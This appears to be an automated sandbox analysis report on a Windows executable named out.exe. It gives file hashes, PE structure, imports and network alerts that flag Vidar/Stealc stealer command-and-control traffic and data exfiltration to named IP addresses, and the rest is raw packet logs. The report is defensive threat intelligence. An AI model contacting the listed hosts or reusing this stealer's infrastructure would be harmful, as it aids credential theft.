                                                                                                                                                                                        • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                        • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                        • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                        Process:C:\Users\user\Desktop\out.exe
                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):450024
                                                                                                                                                                                        Entropy (8bit):6.673992339875127
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
                                                                                                                                                                                        MD5:5FF1FCA37C466D6723EC67BE93B51442
                                                                                                                                                                                        SHA1:34CC4E158092083B13D67D6D2BC9E57B798A303B
                                                                                                                                                                                        SHA-256:5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
                                                                                                                                                                                        SHA-512:4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                        Process:C:\Users\user\Desktop\out.exe
                                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):2046288
                                                                                                                                                                                        Entropy (8bit):6.787733948558952
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
                                                                                                                                                                                        MD5:1CC453CDF74F31E4D913FF9C10ACDDE2
                                                                                                                                                                                        SHA1:6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
                                                                                                                                                                                        SHA-256:AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
                                                                                                                                                                                        SHA-512:DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                        Process:C:\Users\user\Desktop\out.exe
                                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):257872
                                                                                                                                                                                        Entropy (8bit):6.727482641240852
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
                                                                                                                                                                                        MD5:4E52D739C324DB8225BD9AB2695F262F
                                                                                                                                                                                        SHA1:71C3DA43DC5A0D2A1941E874A6D015A071783889
                                                                                                                                                                                        SHA-256:74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
                                                                                                                                                                                        SHA-512:2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                        Process:C:\Users\user\Desktop\out.exe
                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):80880
                                                                                                                                                                                        Entropy (8bit):6.920480786566406
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
                                                                                                                                                                                        MD5:A37EE36B536409056A86F50E67777DD7
                                                                                                                                                                                        SHA1:1CAFA159292AA736FC595FC04E16325B27CD6750
                                                                                                                                                                                        SHA-256:8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
                                                                                                                                                                                        SHA-512:3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                        Process:C:\Users\user\Desktop\out.exe
                                                                                                                                                                                        File Type:HTML document, Unicode text, UTF-8 text, with very long lines (3070), with CRLF, LF line terminators
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):34889
                                                                                                                                                                                        Entropy (8bit):5.398879878767722
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:768:6dpqme0Ih+3tAA6WG9OfcDAhTBv++nIjBtPF5zfJkPVoEAdLTBv++nIjBtPF5x2H:6d8me0Ih+3tAA6WG9OFhTBv++nIjBtPT
                                                                                                                                                                                        MD5:F2396C7A42E077E051828342124AF647
                                                                                                                                                                                        SHA1:42F962F03598E049ABC7DF5714B626BD87B84D30
                                                                                                                                                                                        SHA-256:132EE07E7F11594B396A004AF61B6AE9411684A6FED301D16723A16E22FFD0C1
                                                                                                                                                                                        SHA-512:395C051E8EAE0E4EB49724D75323A943D0D87338A88CADFFAE5A114A6E9AF789427BE3F6C5D539C6D59E56811142BF41E092663F0AD9649D46AE31805BFC8F5F
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:<!DOCTYPE html>..<html class=" responsive" lang="en">..<head>...<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">.....<meta name="viewport" content="width=device-width,initial-scale=1">....<meta name="theme-color" content="#171a21">....<title>Steam Community :: u55u https://49.12.106.214|</title>...<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon">...........<link href="https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&amp;l=english" rel="stylesheet" type="text/css" >.<link href="https://community.akamai.steamstatic.com/public/shared/css/buttons.css?v=PUJIfhtcQn7W&amp;l=english" rel="stylesheet" type="text/css" >.<link href="https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=ezWS9te9Zwm9&amp;l=english" rel="stylesheet" type="text/css" >.<link href="https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&amp;l=english" rel="stylesheet" type="text/css" >.<link hre
                                                                                                                                                                                        Process:C:\Users\user\Desktop\out.exe
                                                                                                                                                                                        File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):1048575
                                                                                                                                                                                        Entropy (8bit):0.0
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:3:fvv3:/
                                                                                                                                                                                        MD5:6FD5E726D086DC29B56D6449B0CBEB7F
                                                                                                                                                                                        SHA1:0E0B1F8292D2E96C2E9D843B95FCD545F15E2C22
                                                                                                                                                                                        SHA-256:6FD0EF87E4CFE63EAFEE1DC4200C58D0AFD5141C15D472B11620AE626169EE49
                                                                                                                                                                                        SHA-512:51D877FC08DF84DBB658920B82150BC884492BFC8A16D50E6A96E1FF3294E2B39CA099F01D02158F37F24E9E4755FAB37B3F09E215F7906B74FA418E048AEF50
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                        Entropy (8bit):6.485330799031038
                                                                                                                                                                                        TrID:
                                                                                                                                                                                        • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                        • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                        File name:out.exe
                                                                                                                                                                                        File size:393'216 bytes
                                                                                                                                                                                        MD5:7a2f8827805aba605ac201a9f0c2cb03
                                                                                                                                                                                        SHA1:f1e15c229cf82f17d5f98cc6ad29247446bf54ca
                                                                                                                                                                                        SHA256:0781a4d72a9f35f27a6608e0e5ec8afbf3ee1e39c656b6e5f0582b60d34fa018
                                                                                                                                                                                        SHA512:c54a99231089c97d58919faa59c2a5d9a64c39a5b0b3ccda0924de43837f65c7cfda81a3d4008c29b9fc0754d7dd9608a6098d1b8419bba4e3db1f0c0e693b61
                                                                                                                                                                                        SSDEEP:6144:elqPvKpKJNJGyRlyIf8aSp0Vbux0R4kF/Y/o8+:emRJNMalyIkaO0Ix6BY/s
                                                                                                                                                                                        TLSH:A6848D1623A030F7E2234575BA454322CBA7B8341661F75FABC405699FFA6C1EE2C71B
                                                                                                                                                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........?d.]^..]^..]^..2(..E^..2(..R^..2(..b^..T&..X^..T&..M^...'..^^..]^...^..2(..M^..2(..\^..Rich]^..........................PE..L..
                                                                                                                                                                                        Icon Hash:00928e8e8686b000
                                                                                                                                                                                        Entrypoint:0x4184ae
                                                                                                                                                                                        Entrypoint Section:.text
                                                                                                                                                                                        Digitally signed:false
                                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                                        Subsystem:windows gui
                                                                                                                                                                                        Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                                                                                                                                        DLL Characteristics:DYNAMIC_BASE, NO_ISOLATION, TERMINAL_SERVER_AWARE
                                                                                                                                                                                        Time Stamp:0x66FB184E [Mon Sep 30 21:29:50 2024 UTC]
                                                                                                                                                                                        TLS Callbacks:
                                                                                                                                                                                        CLR (.Net) Version:
                                                                                                                                                                                        OS Version Major:5
                                                                                                                                                                                        OS Version Minor:1
                                                                                                                                                                                        File Version Major:5
                                                                                                                                                                                        File Version Minor:1
                                                                                                                                                                                        Subsystem Version Major:5
                                                                                                                                                                                        Subsystem Version Minor:1
                                                                                                                                                                                        Import Hash:118187c3a5a9d853faf932e2bfb655fe
                                                                                                                                                                                        Instruction
                                                                                                                                                                                        je 00007F013CF0E215h
                                                                                                                                                                                        jne 00007F013CF0E213h
                                                                                                                                                                                        mov eax, FEA6B0E8h
                                                                                                                                                                                        push dword ptr [ebx+eax+75h]
                                                                                                                                                                                        add dword ptr [eax+000181E8h], edi
                                                                                                                                                                                        add byte ptr [ebx+eax+75h], dh
                                                                                                                                                                                        add dword ptr [eax-0173DB18h], edi
                                                                                                                                                                                        push dword ptr [ebx+eax+75h]
                                                                                                                                                                                        add dword ptr [eax-01725118h], edi
                                                                                                                                                                                        push dword ptr [ebx+eax+75h]
                                                                                                                                                                                        add dword ptr [eax-01725B18h], edi
                                                                                                                                                                                        push dword ptr [ebx+eax+75h]
                                                                                                                                                                                        add dword ptr [eax-01726518h], edi
                                                                                                                                                                                        push dword ptr [ebx+eax+75h]
                                                                                                                                                                                        add dword ptr [eax-01706918h], edi
                                                                                                                                                                                        push dword ptr [ebx+eax+75h]
                                                                                                                                                                                        add dword ptr [eax-01727918h], edi
                                                                                                                                                                                        push dword ptr [ebx+eax+75h]
                                                                                                                                                                                        add dword ptr [eax-01728318h], edi
                                                                                                                                                                                        push dword ptr [ebx+eax+75h]
                                                                                                                                                                                        add dword ptr [eax-01728D18h], edi
                                                                                                                                                                                        push dword ptr [ebx+eax+75h]
                                                                                                                                                                                        add dword ptr [eax-01707918h], edi
                                                                                                                                                                                        push dword ptr [ebx+eax+75h]
                                                                                                                                                                                        add dword ptr [eax-0172A118h], edi
                                                                                                                                                                                        push dword ptr [ebx+eax+75h]
                                                                                                                                                                                        add dword ptr [eax-0172AB18h], edi
                                                                                                                                                                                        push dword ptr [ebx+eax+75h]
                                                                                                                                                                                        add dword ptr [eax-0172B518h], edi
                                                                                                                                                                                        push dword ptr [ebx+eax+75h]
                                                                                                                                                                                        add dword ptr [eax-01704A18h], edi
                                                                                                                                                                                        push dword ptr [ebx+eax+75h]
                                                                                                                                                                                        add dword ptr [eax-0172C918h], edi
                                                                                                                                                                                        push dword ptr [ebx+eax+75h]
                                                                                                                                                                                        add dword ptr [eax-0172D318h], edi
                                                                                                                                                                                        push dword ptr [ebx+eax+75h]
                                                                                                                                                                                        add dword ptr [eax-0172DD18h], edi
                                                                                                                                                                                        jmp far eax
                                                                                                                                                                                        call dword ptr [eax+0374FFFEh]
                                                                                                                                                                                        jne 00007F013CF0E213h
                                                                                                                                                                                        mov eax, FE8D13E8h
                                                                                                                                                                                        push dword ptr [ebx+eax+75h]
                                                                                                                                                                                        add dword ptr [eax+00000000h], edi
                                                                                                                                                                                        Programming Language:
                                                                                                                                                                                        • [C++] VS2010 build 30319
                                                                                                                                                                                        • [ASM] VS2010 build 30319
                                                                                                                                                                                        • [ C ] VS2010 build 30319
                                                                                                                                                                                        • [ C ] VS2008 SP1 build 30729
                                                                                                                                                                                        • [IMP] VS2008 SP1 build 30729
                                                                                                                                                                                        • [LNK] VS2010 build 30319
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x3bb80 | 0xc8 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x270000 | 0xb0 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x271000 | 0x3340 | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x30000 | 0x290 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x2e2b4 | 0x2e400 | 5e1e159009c41d9f233e2d4596ec701b | False | 0.5120988175675676 | Matlab v4 mat-file (little endian) , numeric, rows 4387467, columns 4387480 | 6.455831500975683 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rdata | 0x30000 | 0xc99e | 0xca00 | 2dd74f69da060d7decb221b246bc98ca | False | 0.6049659653465347 | data | 6.367441015660518 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x3d000 | 0x23226c | 0x20200 | 1217b4eb11dab4db3583f64f37447efa | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x270000 | 0xb0 | 0x200 | 4b7115c48fa1ed45d7fd2da2c2df5abb | False | 0.279296875 | data | 4.097217764488071 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x271000 | 0x49b2 | 0x4a00 | 74336b5e1e990d510dead9e0bdbdad32 | False | 0.5687816722972973 | data | 5.49190569334322 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_MANIFEST | 0x270058 | 0x56 | ASCII text, with CRLF line terminators | English | United States | 1.0232558139534884
DLL | Import
msvcrt.dll | strncpy, malloc, _wtoi64, ??_V@YAXPAX@Z, atexit, memchr, strcpy_s, strchr, strtok_s, ??_U@YAPAXI@Z, _time64, srand, rand, memmove, __CxxFrameHandler3
KERNEL32.dll | GetEnvironmentStringsW, FreeEnvironmentStringsW, GetModuleFileNameA, HeapSize, WideCharToMultiByte, IsValidCodePage, GetOEMCP, ExitProcess, SetCriticalSectionSpinCount, FlsAlloc, HeapAlloc, GetCurrentProcess, HeapFree, VirtualFree, GetProcessHeap, WriteFile, VirtualAllocExNuma, Sleep, ReadFile, CreateFileW, lstrcatA, MultiByteToWideChar, GetTempPathW, GetLastError, lstrcmpiA, GetProcAddress, VirtualAlloc, GlobalMemoryStatusEx, ConvertDefaultLocale, lstrcmpiW, GetModuleHandleA, VirtualProtect, CloseHandle, lstrlenA, FreeLibrary, GetThreadContext, SetThreadContext, ReadProcessMemory, SetHandleCount, WriteProcessMemory, VirtualQueryEx, OpenProcess, GetComputerNameA, FileTimeToSystemTime, WaitForSingleObject, GetDriveTypeA, CreateProcessA, CreateDirectoryA, GetLogicalDriveStringsA, CreateThread, CreateFileA, GetFileSize, SetFilePointer, MapViewOfFile, UnmapViewOfFile, lstrcpynA, SystemTimeToFileTime, GetTickCount, GetLocalTime, CreateFileMappingA, GetFileInformationByHandle, lstrcpyA, GetCPInfo, HeapSetInformation, GetCommandLineA, HeapReAlloc, GetLocaleInfoW, LoadLibraryW, InterlockedExchange, SetConsoleCtrlHandler, IsProcessorFeaturePresent, GetCurrentThread, InterlockedDecrement, GetACP, GetCurrentThreadId, SetLastError, GetFileType, QueryPerformanceCounter, GetStartupInfoW, GetCurrentProcessId, GetSystemTimeAsFileTime, LCMapStringW, VirtualAllocEx, GetStringTypeW, InterlockedIncrement, TlsFree, RaiseException, IsValidLocale, EnumSystemLocalesA, GetLocaleInfoA, GetUserDefaultLCID, TlsSetValue, TlsGetValue, TlsAlloc, GetModuleFileNameW, GetStdHandle, GetModuleHandleW, HeapDestroy, TerminateProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, EncodePointer, DecodePointer, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, LeaveCriticalSection, FatalAppExitA, EnterCriticalSection, RtlUnwind, HeapCreate
USER32.dll | GetDesktopWindow, OpenInputDesktop, wsprintfW, IsDialogMessageW, MessageBoxA, GetWindowLongW, ReleaseDC, GetWindowContextHelpId, GetCursorPos, SetThreadDesktop, RegisterClassW, IsWindowVisible, CharToOemA
GDI32.dll | CreateDCA, GetDeviceCaps
ADVAPI32.dll | RegGetValueA, RegOpenKeyExA, GetUserNameA, GetCurrentHwProfileA
SHELL32.dll | SHFileOperationA
ole32.dll | CoInitializeSecurity, CoSetProxyBlanket, CoCreateInstance, CoInitializeEx
OLEAUT32.dll | SysAllocString, SysFreeString, VariantClear, VariantInit
SHLWAPI.dll |
Language of compilation system | Country where language is spoken | Map
English | United States |
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-10-07T20:35:21.007155+0200 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.5 | 49752 | 49.12.106.214 | 443 | TCP
2024-10-07T20:35:22.166238+0200 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.5 | 49763 | 49.12.106.214 | 443 | TCP
2024-10-07T20:35:23.734166+0200 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.5 | 49774 | 49.12.106.214 | 443 | TCP
2024-10-07T20:35:24.405392+0200 | 2049087 | ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST | 1 | 192.168.2.5 | 49774 | 49.12.106.214 | 443 | TCP
2024-10-07T20:35:25.030726+0200 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.5 | 49782 | 49.12.106.214 | 443 | TCP
2024-10-07T20:35:25.704302+0200 | 2044247 | ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config | 1 | 49.12.106.214 | 443 | 192.168.2.5 | 49782 | TCP
2024-10-07T20:35:26.384044+0200 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.5 | 49791 | 49.12.106.214 | 443 | TCP
2024-10-07T20:35:27.078262+0200 | 2051831 | ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 | 1 | 49.12.106.214 | 443 | 192.168.2.5 | 49791 | TCP
2024-10-07T20:35:27.795548+0200 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.5 | 49802 | 49.12.106.214 | 443 | TCP
2024-10-07T20:35:28.802525+0200 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.5 | 49810 | 49.12.106.214 | 443 | TCP
2024-10-07T20:35:31.697871+0200 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.5 | 49831 | 49.12.106.214 | 443 | TCP
2024-10-07T20:35:32.861245+0200 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.5 | 49839 | 49.12.106.214 | 443 | TCP
2024-10-07T20:35:34.359756+0200 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.5 | 49851 | 49.12.106.214 | 443 | TCP
2024-10-07T20:35:35.854422+0200 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.5 | 49860 | 49.12.106.214 | 443 | TCP
                                                                                                                                                                                        2024-10-07T20:35:37.780067+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.54987549.12.106.214443TCP
                                                                                                                                                                                        2024-10-07T20:35:39.358579+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.54988749.12.106.214443TCP
                                                                                                                                                                                        2024-10-07T20:35:41.113143+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.54989949.12.106.214443TCP
                                                                                                                                                                                        2024-10-07T20:35:43.163643+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.54991349.12.106.214443TCP
                                                                                                                                                                                        2024-10-07T20:35:44.613860+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.54992449.12.106.214443TCP
                                                                                                                                                                                        2024-10-07T20:35:47.991700+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.54994649.12.106.214443TCP
                                                                                                                                                                                        2024-10-07T20:35:49.382271+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.54995349.12.106.214443TCP
                                                                                                                                                                                        2024-10-07T20:35:50.698257+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.54996349.12.106.214443TCP
                                                                                                                                                                                        2024-10-07T20:35:52.212160+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.54997449.12.106.214443TCP
                                                                                                                                                                                        2024-10-07T20:35:54.353536+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.54998849.12.106.214443TCP
                                                                                                                                                                                        2024-10-07T20:35:56.383056+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.54999849.12.106.214443TCP
                                                                                                                                                                                        2024-10-07T20:35:57.702528+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.54999949.12.106.214443TCP
                                                                                                                                                                                        2024-10-07T20:35:59.176328+02002054495ET MALWARE Vidar Stealer Form Exfil1192.168.2.55000045.132.206.25180TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                                                                                                        Oct 7, 2024 20:35:25.704049110 CEST4434978249.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:25.704082012 CEST4434978249.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:25.704101086 CEST49782443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:25.704128027 CEST49782443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:25.704149008 CEST49782443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:25.704406977 CEST49782443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:25.704435110 CEST4434978249.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:25.741667032 CEST49791443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:25.741760015 CEST4434979149.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:25.741858959 CEST49791443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:25.742046118 CEST49791443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:25.742079973 CEST4434979149.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:26.383939981 CEST4434979149.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:26.384043932 CEST49791443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:26.384964943 CEST49791443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:26.384993076 CEST4434979149.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:26.386778116 CEST49791443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:26.386791945 CEST4434979149.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:27.078044891 CEST4434979149.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:27.078134060 CEST4434979149.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:27.078310966 CEST49791443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:27.078310966 CEST49791443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:27.078435898 CEST49791443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:27.078459024 CEST4434979149.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:27.155009031 CEST49802443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:27.155061007 CEST4434980249.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:27.155144930 CEST49802443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:27.155359983 CEST49802443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:27.155376911 CEST4434980249.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:27.795401096 CEST4434980249.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:27.795547962 CEST49802443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:27.795980930 CEST49802443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:27.795995951 CEST4434980249.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:27.797436953 CEST49802443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:27.797450066 CEST4434980249.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:27.797477007 CEST49802443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:27.797487974 CEST4434980249.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:28.162806988 CEST49810443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:28.162846088 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:28.163039923 CEST49810443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:28.163353920 CEST49810443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:28.163367033 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:28.554567099 CEST4434980249.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:28.554644108 CEST49802443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:28.554676056 CEST4434980249.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:28.554738045 CEST4434980249.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:28.554794073 CEST49802443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:28.555840969 CEST49802443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:28.555864096 CEST4434980249.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:28.801531076 CEST4434981049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:28.802525043 CEST49810443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:28.802980900 CEST49810443192.168.2.549.12.106.214
